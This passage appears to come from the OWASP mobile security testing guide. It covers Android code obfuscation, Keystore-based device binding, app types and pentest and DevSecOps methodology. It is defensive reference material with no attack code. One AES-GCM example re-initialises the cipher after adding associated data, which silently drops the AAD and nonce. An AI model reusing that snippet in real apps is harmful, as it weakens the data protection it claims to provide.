"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
Android apps can implement some of those obfuscation techniques using different tooling. For example, ProGuard offers an easy way to shrink and obfuscate code and to strip unneeded debugging information from the bytecode of Android Java apps. It replaces identifiers, such as class names, method names, and variable names, with meaningless character strings. This is a type of layout obfuscation, which doesn't impact the program's performance.
Decompiling Java classes is trivial, therefore it is recommended to always apply some basic obfuscation to the production bytecode.
Learn more about Android obfuscation techniques:
Developers use the build.gradle file to enable obfuscation. In the example below, you can see that minifyEnabled
and proguardFiles
are set. Creating exceptions to protect some classes from obfuscation (with -keepclassmembers
and -keep class
) is common. Therefore, auditing the ProGuard configuration file to see what classes are exempted is important. The getDefaultProguardFile('proguard-android.txt')
method gets the default ProGuard settings from the <Android SDK>/tools/proguard/
folder.
Further information on how to shrink, obfuscate, and optimize your app can be found in the Android developer documentation.
When you build your project using Android Studio 3.4 or Android Gradle plugin 3.4.0 or higher, the plugin no longer uses ProGuard to perform compile-time code optimization. Instead, the plugin uses the R8 compiler. R8 works with all of your existing ProGuard rules files, so updating the Android Gradle plugin to use R8 should not require you to change your existing rules.
R8 is the new code shrinker from Google and was introduced in Android Studio 3.3 beta. By default, R8 removes attributes that are useful for debugging, including line numbers, source file names, and variable names. R8 is a free Java class file shrinker, optimizer, obfuscator, and pre-verifier and is faster than ProGuard, see also an Android Developer blog post for further details. It is shipped with Android's SDK tools. To activate shrinking for the release build, add the following to build.gradle:
android {\n buildTypes {\n release {\n // Enables code shrinking, obfuscation, and optimization for only\n // your project's release build type.\n minifyEnabled true\n\n // Includes the default ProGuard rules files that are packaged with\n // the Android Gradle plugin. To learn more, go to the section about\n // R8 configuration files.\n proguardFiles getDefaultProguardFile(\n 'proguard-android-optimize.txt'),\n 'proguard-rules.pro'\n }\n }\n ...\n}\n
The file proguard-rules.pro
is where you define custom ProGuard rules. With the flag -keep
you can keep certain code that is not being removed by R8, which might otherwise produce errors. For example to keep common Android classes, as in our sample configuration proguard-rules.pro
file:
...\n-keep public class * extends android.app.Activity\n-keep public class * extends android.app.Application\n-keep public class * extends android.app.Service\n...\n
You can define this more granularly on specific classes or libraries in your project with the following syntax:
-keep public class MyClass\n
Obfuscation often carries a cost in runtime performance, therefore it is usually only applied to certain very specific parts of the code, typically those dealing with security and runtime protection.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The goal of device binding is to impede an attacker who tries to both copy an app and its state from device A to device B and continue executing the app on device B. After device A has been determined trustworthy, it may have more privileges than device B. These differential privileges should not change when an app is copied from device A to device B.
Before we describe the usable identifiers, let's quickly discuss how they can be used for binding. There are three methods that allow device binding:
Augmenting the credentials used for authentication with device identifiers. This makes sense if the application needs to re-authenticate itself and/or the user frequently.
Encrypting the data stored on the device with key material that is strongly bound to the device can strengthen the device binding. The Android Keystore offers non-exportable private keys which we can use for this. If a malicious actor were to extract such data from a device, it would not be possible to decrypt the data, as the key is not accessible. Implementing this takes the following steps:
KeyGenParameterSpec
API.//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_RSA, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(\n \"key1\",\n KeyProperties.PURPOSE_DECRYPT)\n .setDigests(KeyProperties.DIGEST_SHA256, KeyProperties.DIGEST_SHA512)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_RSA_OAEP)\n .build());\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\nCipher cipher = Cipher.getInstance(\"RSA/ECB/OAEPWithSHA-256AndMGF1Padding\");\ncipher.init(Cipher.DECRYPT_MODE, keyPair.getPrivate());\n...\n\n// The key pair can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey privateKey = (PrivateKey) keyStore.getKey(\"key1\", null);\nPublicKey publicKey = keyStore.getCertificate(\"key1\").getPublicKey();\n
//Source: <https://developer.android.com/reference/android/security/keystore/KeyGenParameterSpec.html>\nKeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\nkeyGenerator.init(\n new KeyGenParameterSpec.Builder(\"key2\",\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_GCM)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)\n .build());\nSecretKey key = keyGenerator.generateKey();\n\n// The key can also be obtained from the Android Keystore any time as follows:\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nkey = (SecretKey) keyStore.getKey(\"key2\", null);\n
Cipher cipher = Cipher.getInstance(\"AES/GCM/NoPadding\");\nfinal byte[] nonce = new byte[GCM_NONCE_LENGTH];\nrandom.nextBytes(nonce);\nGCMParameterSpec spec = new GCMParameterSpec(GCM_TAG_LENGTH * 8, nonce);\ncipher.init(Cipher.ENCRYPT_MODE, key, spec);\nbyte[] aad = \"<deviceidentifierhere>\".getBytes();;\ncipher.updateAAD(aad);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\n//use the cipher to encrypt the authentication data see 0x50e for more details.\n
Use token-based device authentication (Instance ID) to make sure that the same instance of the app is used.
When we use the term \"mobile application\" or \"mobile app,\" we are referring to a self-contained computer program designed to execute on a mobile device. At the time of publication, the Android and iOS operating systems cumulatively comprise more than 99% of the mobile OS market share and mobile Internet usage has surpassed desktop usage for the first time in history. This means that mobile apps are the most widespread types of Internet-capable apps.
Also, this guide uses the term \"app\" as a general term which refers to any kind of application that runs on a mobile OS. Usually, apps run directly on the platform for which they\u2019re designed, run on top of a smart device\u2019s mobile browser, or they use a mix of these two methods. In this chapter, we will develop a mobile app taxonomy which will fit all apps into categories then discuss the variations of each app category.
We place mobile apps into four categories:
Native Apps Web Apps Hybrid Apps Progressive Web Apps
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#native-apps","title":"Native Apps","text":"If a mobile app is developed with a Software Development Kit (SDK) for developing apps specific to a mobile OS, they are referred to as native to their OS. If we are discussing a native app, we presume it was implemented in a standard programming language for that mobile operating system - Objective-C or Swift for iOS, and Java or Kotlin for Android.
Because they are designed for a specific OS with the tools meant for that OS, native apps have the capability to provide the fastest performance with the highest degree of reliability. They usually adhere to platform-specific design principles (e.g. the Android Design Principles), which usually leads to a more consistent user interface (UI) compared to hybrid or web apps. Due to their close integration with the operating system, native apps generally can directly access almost every component of the device (camera, sensors, hardware-backed key stores, etc.).
However, since Android provides two development kits - the Android SDK and the Android NDK, there is some ambiguity to the term native apps for this platform. While the SDK (based on the Java and Kotlin programming language) is the default for developing apps, the platform's NDK (or Native Development Kit) is a C/C++ kit used for developing binary libraries that can directly access lower level APIs (such as OpenGL). These libraries can be included in regular apps built with the SDK. Therefore, we say that Android native apps (i.e. built with the SDK) may have native code built with the NDK.
The most obvious disadvantage of native apps is that they are limited to one specific platform. If developers want to build their app for both Android and iOS, one needs to maintain two independent code bases, or introduce often complex development tools to port a single code base to two platforms.
Here are some multi-platform frameworks that allow developers to compile a single codebase for both Android and iOS:
If an app is developed using these frameworks, the app will use the internal APIs native to each system and offer performance equivalent to native apps. Also, these apps can make use of all device capabilities, including the GPS, accelerometer, camera, the notification system, etc. Since the final output is very similar to previously discussed native apps, apps developed using these frameworks are said to be native apps.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#web-apps","title":"Web Apps","text":"Mobile web apps (or simply, web apps) are websites designed to look and feel like a native app. These apps run on top of a device\u2019s browser and are usually developed in HTML5, much like a modern web page. Launcher icons may be used to parallel the same feel of accessing a native app; however, these icons are essentially the same as a browser bookmark, simply opening the default web browser to load the referenced web page.
Because they run within the confines of a browser, web apps have limited integration with the general components of the device (i.e. they are \"sandboxed\") and their performance is usually inferior compared to native apps. Since developers usually target multiple platforms with a web app, their UIs generally do not follow the design principles of any specific platform. However, web apps are popular because developers can use a single code base to reduce development and maintenance costs and distribute updates without going through the platform-specific app stores. For example, a change to the HTML file for a web app can serve as viable, cross-platform update whereas an update to a store-based app requires considerably more effort.
"},{"location":"MASTG/General/0x04a-Mobile-App-Taxonomy/#hybrid-apps","title":"Hybrid Apps","text":"Hybrid apps try to benefit from the best aspects of native and web apps. This type of app executes like a native app, but a majority of the processes rely on web technologies, meaning a portion of the app runs in an embedded web browser (commonly called \"WebView\"). As such, hybrid apps inherit both pros and cons of native and web apps. These apps can use a web-to-native abstraction layer to access device capabilities that are not accessible to a pure web app. Depending on the framework used for development, a hybrid app code base can generate multiple apps that target different platforms and take advantage of UIs that closely resemble a device's original platform.
Here are some popular frameworks for developing hybrid apps:
Progressive web apps (PWAs) combine different open standards of the web offered by modern browsers to provide benefits of a rich mobile experience. A Web App Manifest, which is a simple JSON file, can be used to configure the behavior of the app after \"installation\". These apps load like regular web pages, but differ from usual web apps in several ways.
For example, it's possible to work offline and access to mobile device hardware is possible, a capability that was previously only available to native apps. PWAs are supported by both Android and iOS, but not all hardware features are yet available. For example, Push Notifications, Face ID on iPhone X, or ARKit for augmented reality is not available yet on iOS.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/","title":"Mobile Application Security Testing","text":"In the following sections we'll provide a brief overview of general security testing principles and key terminology. The concepts introduced are largely identical to those found in other types of penetration testing, so if you are an experienced tester you may be familiar with some of the content.
Throughout the guide, we use \"mobile app security testing\" as a catchall phrase to refer to the evaluation of mobile app security via static and dynamic analysis. Terms such as \"mobile app penetration testing\" and \"mobile app security review\" are used somewhat inconsistently in the security industry, but these terms refer to roughly the same thing. A mobile app security test is usually part of a larger security assessment or penetration test that encompasses the client-server architecture and server-side APIs used by the mobile app.
In this guide, we cover mobile app security testing in two contexts. The first is the \"classical\" security test completed near the end of the development life cycle. In this context, the tester accesses a nearly finished or production-ready version of the app, identifies security issues, and writes a (usually devastating) report. The other context is characterized by the implementation of requirements and the automation of security tests from the beginning of the software development life cycle onwards. The same basic requirements and test cases apply to both contexts, but the high-level method and the level of client interaction differ.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#principles-of-testing","title":"Principles of Testing","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#white-box-testing-versus-black-box-testing","title":"White-box Testing versus Black-box Testing","text":"Let's start by defining the concepts:
We strongly advise that you request the source code so that you can use the testing time as efficiently as possible. The tester's code access obviously doesn't simulate an external attack, but it simplifies the identification of vulnerabilities by allowing the tester to verify every identified anomaly or suspicious behavior at the code level. A white-box test is the way to go if the app hasn't been tested before.
Even though decompiling on Android is straightforward, the source code may be obfuscated, and de-obfuscating will be time-consuming. Time constraints are therefore another reason for the tester to have access to the source code.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#vulnerability-analysis","title":"Vulnerability Analysis","text":"Vulnerability analysis is usually the process of looking for vulnerabilities in an app. Although this may be done manually, automated scanners are usually used to identify the main vulnerabilities. Static and dynamic analysis are types of vulnerability analysis.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-versus-dynamic-analysis","title":"Static versus Dynamic Analysis","text":"Static Application Security Testing (SAST) involves examining an app's components without executing them, by analyzing the source code either manually or automatically. OWASP provides information about Static Code Analysis that may help you understand techniques, strengths, weaknesses, and limitations.
Dynamic Application Security Testing (DAST) involves examining the app during runtime. This type of analysis can be manual or automatic. It usually doesn't provide the information that static analysis provides, but it is a good way to detect interesting elements (assets, features, entry points, etc.) from a user's point of view.
Now that we have defined static and dynamic analysis, let's dive deeper.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#static-analysis","title":"Static Analysis","text":"During static analysis, the mobile app's source code is reviewed to ensure appropriate implementation of security controls. In most cases, a hybrid automatic/manual approach is used. Automatic scans catch the low-hanging fruit, and the human tester can explore the code base with specific usage contexts in mind.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#manual-code-review","title":"Manual Code Review","text":"A tester performs manual code review by manually analyzing the mobile app's source code for security vulnerabilities. Methods range from a basic keyword search via the 'grep' command to a line-by-line examination of the source code. IDEs (Integrated Development Environments) often provide basic code review functions and can be extended with various tools.
A common approach to manual code analysis entails identifying key security vulnerability indicators by searching for certain APIs and keywords, such as database-related method calls like \"executeStatement\" or \"executeQuery\". Code containing these strings is a good starting point for manual analysis.
In contrast to automatic code analysis, manual code review is very good for identifying vulnerabilities in the business logic, standards violations, and design flaws, especially when the code is technically secure but logically flawed. Such scenarios are unlikely to be detected by any automatic code analysis tool.
A manual code review requires an expert code reviewer who is proficient in both the language and the frameworks used for the mobile app. Full code review can be a slow, tedious, time-consuming process for the reviewer, especially given large code bases with many dependencies.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-source-code-analysis","title":"Automated Source Code Analysis","text":"Automated analysis tools can be used to speed up the review process of Static Application Security Testing (SAST). They check the source code for compliance with a predefined set of rules or industry best practices, then typically display a list of findings or warnings and flags for all detected violations. Some static analysis tools run against the compiled app only, some must be fed the original source code, and some run as live-analysis plugins in the Integrated Development Environment (IDE).
Although some static code analysis tools incorporate a lot of information about the rules and semantics required to analyze mobile apps, they may produce many false positives, particularly if they are not configured for the target environment. A security professional must therefore always review the results.
The chapter \"Testing Tools\" includes a list of static analysis tools, which can be found at the end of this book.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#dynamic-analysis","title":"Dynamic Analysis","text":"The focus of DAST is the testing and evaluation of apps via their real-time execution. The main objective of dynamic analysis is finding security vulnerabilities or weak spots in a program while it is running. Dynamic analysis is conducted both at the mobile platform layer and against the backend services and APIs, where the mobile app's request and response patterns can be analyzed.
Dynamic analysis is usually used to check for security mechanisms that provide sufficient protection against the most prevalent types of attack, such as disclosure of data in transit, authentication and authorization issues, and server configuration errors.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#avoiding-false-positives","title":"Avoiding False Positives","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#automated-scanning-tools","title":"Automated Scanning Tools","text":"Automated testing tools' lack of sensitivity to app context is a challenge. These tools may identify a potential issue that's irrelevant. Such results are called \"false positives\".
For example, security testers commonly report vulnerabilities that are exploitable in a web browser but aren't relevant to the mobile app. This false positive occurs because automated tools used to scan the backend service are based on regular browser-based web apps. Issues such as CSRF (Cross-site Request Forgery) and Cross-Site Scripting (XSS) are reported accordingly.
Let's take CSRF as an example. A successful CSRF attack requires the following:
Mobile apps don't fulfill these requirements: even if WebViews and cookie-based session management are used, any malicious link the user clicks opens in the default browser, which has a separate cookie store.
Stored Cross-Site Scripting (XSS) can be an issue if the app includes WebViews, and it may even lead to command execution if the app exports JavaScript interfaces. However, reflected Cross-Site Scripting is rarely an issue for the reason mentioned above (even though whether they should exist at all is arguable, escaping output is simply a best practice).
In any case, consider exploit scenarios when you perform the risk assessment; don't blindly trust your scanning tool's output.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#penetration-testing-aka-pentesting","title":"Penetration Testing (a.k.a. Pentesting)","text":"The classic approach involves all-around security testing of the app's final or near-final build, e.g., the build that's available at the end of the development process. For testing at the end of the development process, we recommend the Mobile App Security Verification Standard (MASVS) and the associated checklist as baseline for testing. A typical security test is structured as follows:
The security level at which the app will be tested must be decided before testing. The security requirements should be decided at the beginning of the project. Different organizations have different security needs and resources available for investing in test activities. Although the controls in MASVS Level 1 (L1) are applicable to all mobile apps, walking through the entire checklist of L1 and Level 2 (L2) MASVS controls with technical and business stakeholders is a good way to decide on a level of test coverage.
Organizations may have different regulatory and legal obligations in certain territories. Even if an app doesn't handle sensitive data, some L2 requirements may be relevant (because of industry regulations or local laws). For example, two-factor authentication (2FA) may be obligatory for a financial app and enforced by a country's central bank and/or financial regulatory authorities.
Security goals/controls defined earlier in the development process may also be reviewed during the discussion with stakeholders. Some controls may conform to MASVS controls, but others may be specific to the organization or app.
All involved parties must agree on the decisions and the scope in the checklist because these will define the baseline for all security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#coordinating-with-the-client","title":"Coordinating with the Client","text":"Setting up a working test environment can be a challenging task. For example, restrictions on the enterprise wireless access points and networks may impede dynamic analysis performed at client premises. Company policies may prohibit the use of rooted phones or (hardware and software) network testing tools within enterprise networks. Apps that implement root detection and other reverse engineering countermeasures may significantly increase the work required for further analysis.
Security testing involves many invasive tasks, including monitoring and manipulating the mobile app's network traffic, inspecting the app data files, and instrumenting API calls. Security controls, such as certificate pinning and root detection, may impede these tasks and dramatically slow testing down.
To overcome these obstacles, you may want to request two of the app's build variants from the development team. One variant should be a release build so that you can determine whether the implemented controls are working properly and can't be bypassed easily. The second variant should be a debug build for which certain security controls have been deactivated. Testing two different builds is the most efficient way to cover all test cases.
Depending on the scope of the engagement, this approach may not be possible. Requesting both production and debug builds for a white-box test will help you complete all test cases and clearly state the app's security maturity. The client may prefer that black-box tests be focused on the production app and the evaluation of its security controls' effectiveness.
The scope of both types of testing should be discussed during the preparation phase. For example, whether the security controls should be adjusted should be decided before testing. Additional topics are discussed below.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#identifying-sensitive-data","title":"Identifying Sensitive Data","text":"Classifications of sensitive information differ by industry and country. In addition, organizations may take a restrictive view of sensitive data, and they may have a data classification policy that clearly defines sensitive information.
There are three general states from which data may be accessible:
The degree of scrutiny that's appropriate for each state may depend on the data's importance and likelihood of being accessed. For example, data held in app memory may be more vulnerable than data on web servers to access via core dumps because attackers are more likely to gain physical access to mobile devices than to web servers.
When no data classification policy is available, use the following list of information that's generally considered sensitive:
A definition of \"sensitive data\" must be decided before testing begins because detecting sensitive data leakage without a definition may be impossible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#intelligence-gathering","title":"Intelligence Gathering","text":"Intelligence gathering involves the collection of information about the app's architecture, the business use cases the app serves, and the context in which the app operates. Such information may be classified as \"environmental\" or \"architectural\".
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#environmental-information","title":"Environmental Information","text":"Environmental information includes:
Architectural information includes:
Once the security tester has information about the app and its context, the next step is mapping the app's structure and content, e.g., identifying its entry points, features, and data.
When penetration testing is performed in a white-box or grey-box paradigm, any documents from the interior of the project (architecture diagrams, functional specifications, code, etc.) may greatly facilitate the process. If source code is available, the use of SAST tools can reveal valuable information about vulnerabilities (e.g., SQL Injection). DAST tools may support black-box testing and automatically scan the app: whereas a tester will need hours or days, a scanner may perform the same task in a few minutes. However, it's important to remember that automatic tools have limitations and will only find what they have been programmed to find. Therefore, human analysis may be necessary to augment results from automatic tools (intuition is often key to security testing).
Threat Modeling is an important artifact: documents from the workshop usually greatly support the identification of much of the information a security tester needs (entry points, assets, vulnerabilities, severity, etc.). Testers are strongly advised to discuss the availability of such documents with the client. Threat modeling should be a key part of the software development life cycle. It usually occurs in the early phases of a project.
The threat modeling guidelines defined in OWASP are generally applicable to mobile apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#exploitation","title":"Exploitation","text":"Unfortunately, time or financial constraints limit many pentests to application mapping via automated scanners (for vulnerability analysis, for example). Although vulnerabilities identified during the previous phase may be interesting, their relevance must be confirmed with respect to five axes:
Against all odds, some vulnerabilities may not be exploitable and may lead to minor compromises, if any. Other vulnerabilities may seem harmless at first sight, yet be determined very dangerous under realistic test conditions. Testers who carefully go through the exploitation phase support pentesting by characterizing vulnerabilities and their effects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#reporting","title":"Reporting","text":"The security tester's findings will be valuable to the client only if they are clearly documented. A good pentest report should include information such as, but not limited to, the following:
Many pentest report templates are available on the Internet: Google is your friend!
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-and-the-sdlc","title":"Security Testing and the SDLC","text":"Although the principles of security testing haven't fundamentally changed in recent history, software development techniques have changed dramatically. While the widespread adoption of Agile practices was speeding up software development, security testers had to become quicker and more agile while continuing to deliver trustworthy software.
The following section is focused on this evolution and describes contemporary security testing.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-during-the-software-development-life-cycle","title":"Security Testing during the Software Development Life Cycle","text":"Software development is not very old, after all, so the end of developing without a framework is easy to observe. We have all experienced the need for a minimal set of rules to control work as the source code grows.
In the past, \"Waterfall\" methodologies were the most widely adopted: development proceeded by steps that had a predefined sequence. Limited to a single step, backtracking capability was a serious drawback of Waterfall methodologies. Although they have important positive features (providing structure, helping testers clarify where effort is needed, being clear and easy to understand, etc.), they also have negative ones (creating silos, being slow, specialized teams, etc.).
As software development matured, competition increased and developers needed to react to market changes more quickly while creating software products with smaller budgets. The idea of less structure became popular, and smaller teams collaborated, breaking silos throughout the organization. The \"Agile\" concept was born (Scrum, XP, and RAD are well-known examples of Agile implementations); it enabled more autonomous teams to work together more quickly.
Security wasn't originally an integral part of software development. It was an afterthought, performed at the network level by operation teams who had to compensate for poor software security! Although unintegrated security was possible when software programs were located inside a perimeter, the concept became obsolete as new kinds of software consumption emerged with web, mobile, and IoT technologies. Nowadays, security must be baked inside software because compensating for vulnerabilities is often very difficult.
\"SDLC\" will be used interchangeably with \"Secure SDLC\" in the following section to help you internalize the idea that security is a part of software development processes. In the same spirit, we use the name DevSecOps to emphasize the fact that security is part of DevOps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#sdlc-overview","title":"SDLC Overview","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#general-description-of-sdlc","title":"General Description of SDLC","text":"SDLCs always consist of the same steps (the overall process is sequential in the Waterfall paradigm and iterative in the Agile paradigm):
The picture below illustrates all the phases and artifacts:
Based on the project's general risk profile, you may simplify (or even skip) some artifacts, and you may add others (formal intermediary approvals, formal documentation of certain points, etc.). Always remember two things: an SDLC is meant to reduce risks associated with software development, and it is a framework that helps you set up controls to that end. This is a generic description of SDLC; always tailor this framework to your projects.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#defining-a-test-strategy","title":"Defining a Test Strategy","text":"Test strategies specify the tests that will be performed during the SDLC as well as testing frequency. Test strategies are used to make sure that the final software product meets security objectives, which are generally determined by clients' legal/marketing/corporate teams. The test strategy is usually created during the Secure Design phase, after risks have been clarified (during the Initiation phase) and before code development (the Secure Implementation phase) begins. The strategy requires input from activities such as Risk Management, previous Threat Modeling, and Security Engineering.
A Test Strategy needn't be formally written: it may be described through Stories (in Agile projects), quickly enumerated in checklists, or specified as test cases for a given tool. However, the strategy must definitely be shared because it must be implemented by a team other than the team who defined it. Moreover, all technical teams must agree to it to ensure that it doesn't place unacceptable burdens on any of them.
Test Strategies address topics such as the following:
To track the testing strategy's progress and effectiveness, metrics should be defined, continually updated during the project, and periodically communicated. An entire book could be written about choosing relevant metrics; the most we can say here is that they depend on risk profiles, projects, and organizations. Examples of metrics include the following:
These are only suggestions; other metrics may be more relevant to your project. Metrics are powerful tools for getting a project under control, provided they give project managers a clear and synthetic perspective on what is happening and what needs to be improved.
Distinguishing between tests performed by an internal team and tests performed by an independent third party is important. Internal tests are usually useful for improving daily operations, while third-party tests are more beneficial to the whole organization. Internal tests can be performed quite often, but third-party testing happens at most once or twice a year; also, the former are less expensive than the latter. Both are necessary, and many regulations mandate tests from an independent third party because such tests can be more trustworthy.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-in-waterfall","title":"Security Testing in Waterfall","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-waterfall-is-and-how-testing-activities-are-arranged","title":"What Waterfall Is and How Testing Activities Are Arranged","text":"Basically, SDLC doesn't mandate the use of any development life cycle: it is safe to say that security can (and must!) be addressed in any situation.
Waterfall methodologies were popular before the 21st century. The most famous application is called the \"V model\", in which phases are performed in sequence and you can backtrack only a single step. The testing activities of this model occur in sequence and are performed as a whole, mostly at the point in the life cycle when most of the app development is complete. This activity sequence means that changing the architecture and other factors that were set up at the beginning of the project is hardly possible even though code may be changed after defects have been identified.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security-testing-for-agiledevops-and-devsecops","title":"Security Testing for Agile/DevOps and DevSecOps","text":"DevOps refers to practices that focus on a close collaboration between all stakeholders involved in software development (generally called Devs) and operations (generally called Ops). DevOps is not about merging Devs and Ops. Development and operations teams originally worked in silos, when pushing developed software to production could take a significant amount of time. When development teams made moving more deliveries to production necessary by working with Agile, operation teams had to speed up to match the pace. DevOps is the necessary evolution of the solution to that challenge in that it allows software to be released to users more quickly. This is largely accomplished via extensive build automation, the process of testing and releasing software, and infrastructure changes (in addition to the collaboration aspect of DevOps). This automation is embodied in the deployment pipeline with the concepts of Continuous Integration and Continuous Delivery (CI/CD).
People may assume that the term \"DevOps\" represents collaboration between development and operations teams only, however, as DevOps thought leader Gene Kim puts it: \"At first blush, it seems as though the problems are just between Devs and Ops, but test is in there, and you have information security objectives, and the need to protect systems and data. These are top-level concerns of management, and they have become part of the DevOps picture.\"
In other words, DevOps collaboration includes quality teams, security teams, and many other teams related to the project. When you hear \"DevOps\" today, you should probably be thinking of something like DevOpsQATestInfoSec. Indeed, DevOps values pertain to increasing not only speed but also quality, security, reliability, stability, and resilience.
Security is just as critical to business success as the overall quality, performance, and usability of an app. As development cycles are shortened and delivery frequencies increased, making sure that quality and security are built in from the very beginning becomes essential. DevSecOps is all about adding security to DevOps processes. Most defects are identified during production. DevOps specifies best practices for identifying as many defects as possible early in the life cycle and for minimizing the number of defects in the released app.
However, DevSecOps is not just a linear process oriented towards delivering the best possible software to operations; it is also a mandate that operations closely monitor software that's in production to identify issues and fix them by forming a quick and efficient feedback loop with development. DevSecOps is a process through which Continuous Improvement is heavily emphasized.
The human aspect of this emphasis is reflected in the creation of cross-functional teams that work together to achieve business outcomes. This section is focused on necessary interactions and integrating security into the development life cycle (which starts with project inception and ends with the delivery of value to users).
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#what-agile-and-devsecops-are-and-how-testing-activities-are-arranged","title":"What Agile and DevSecOps Are and How Testing Activities Are Arranged","text":""},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#overview","title":"Overview","text":"Automation is a key DevSecOps practice: as stated earlier, the frequency of deliveries from development to operation increases when compared to the traditional approach, and activities that usually require time need to keep up, e.g. deliver the same added value while taking less time. Unproductive activities must consequently be abandoned, and essential tasks must be fastened. These changes impact infrastructure changes, deployment, and security:
The following sections provide more details about these three points.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#infrastructure-as-code","title":"Infrastructure as Code","text":"Instead of manually provisioning computing resources (physical servers, virtual machines, etc.) and modifying configuration files, Infrastructure as Code is based on the use of tools and automation to fasten the provisioning process and make it more reliable and repeatable. Corresponding scripts are often stored under version control to facilitate sharing and issue resolution.
Infrastructure as Code practices facilitate collaboration between development and operations teams, with the following results:
Infrastructure as Code also facilitates the construction of the environments required by classical software creation projects, for development (\"DEV\"), integration (\"INT\"), testing (\"PPR\" for Pre-Production. Some tests are usually performed in earlier environments, and PPR tests mostly pertain to non-regression and performance with data that's similar to data used in production), and production (\"PRD\"). The value of infrastructure as code lies in the possible similarity between environments (they should be the same).
Infrastructure as Code is commonly used for projects that have Cloud-based resources because many vendors provide APIs that can be used for provisioning items (such as virtual machines, storage spaces, etc.) and working on configurations (e.g., modifying memory sizes or the number of CPUs used by virtual machines). These APIs provide alternatives to administrators' performing these activities from monitoring consoles.
The main tools in this domain are Puppet, Terraform, Packer, Chef and Ansible.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#deployment","title":"Deployment","text":"The deployment pipeline's sophistication depends on the maturity of the project organization or development team. In its simplest form, the deployment pipeline consists of a commit phase. The commit phase usually involves running simple compiler checks and the unit test suite as well as creating a deployable artifact of the app. A release candidate is the latest version that has been checked into the trunk of the version control system. Release candidates are evaluated by the deployment pipeline for conformity to standards they must fulfill for deployment to production.
The commit phase is designed to provide instant feedback to developers and is therefore run on every commit to the trunk. Time constraints exist because of this frequency. The commit phase should usually be complete within five minutes, and it shouldn't take longer than ten. Adhering to this time constraint is quite challenging when it comes to security because many security tools can't be run quickly enough (#paul, #mcgraw).
CI/CD means \"Continuous Integration/Continuous Delivery\" in some contexts and \"Continuous Integration/Continuous Deployment\" in others. Actually, the logic is:
The delivery and deployment of apps with low or medium sensitivity may be merged into a single step, and validation may be performed after delivery. However, keeping these two actions separate and using strong validation are strongly advised for sensitive apps.
"},{"location":"MASTG/General/0x04b-Mobile-App-Security-Testing/#security","title":"Security","text":"At this point, the big question is: now that other activities required for delivering code are completed significantly faster and more effectively, how can security keep up? How can we maintain an appropriate level of security? Delivering value to users more often with decreased security would definitely not be good!
Once again, the answer is automation and tooling: by implementing these two concepts throughout the project life cycle, you can maintain and improve security. The higher the expected level of security, the more controls, checkpoints, and emphasis will take place. The following are examples:
The security of an app developed with DevOps must be considered during operations. The following are examples:
Reverse engineering and tampering techniques have long belonged to the realm of crackers, modders, malware analysts, etc. For \"traditional\" security testers and researchers, reverse engineering has been more of a complementary skill. But the tides are turning: mobile app black-box testing increasingly requires disassembling compiled apps, applying patches, and tampering with binary code or even live processes. The fact that many mobile apps implement defenses against unwelcome tampering doesn't make things easier for security testers.
Reverse engineering a mobile app is the process of analyzing the compiled app to extract information about its source code. The goal of reverse engineering is comprehending the code.
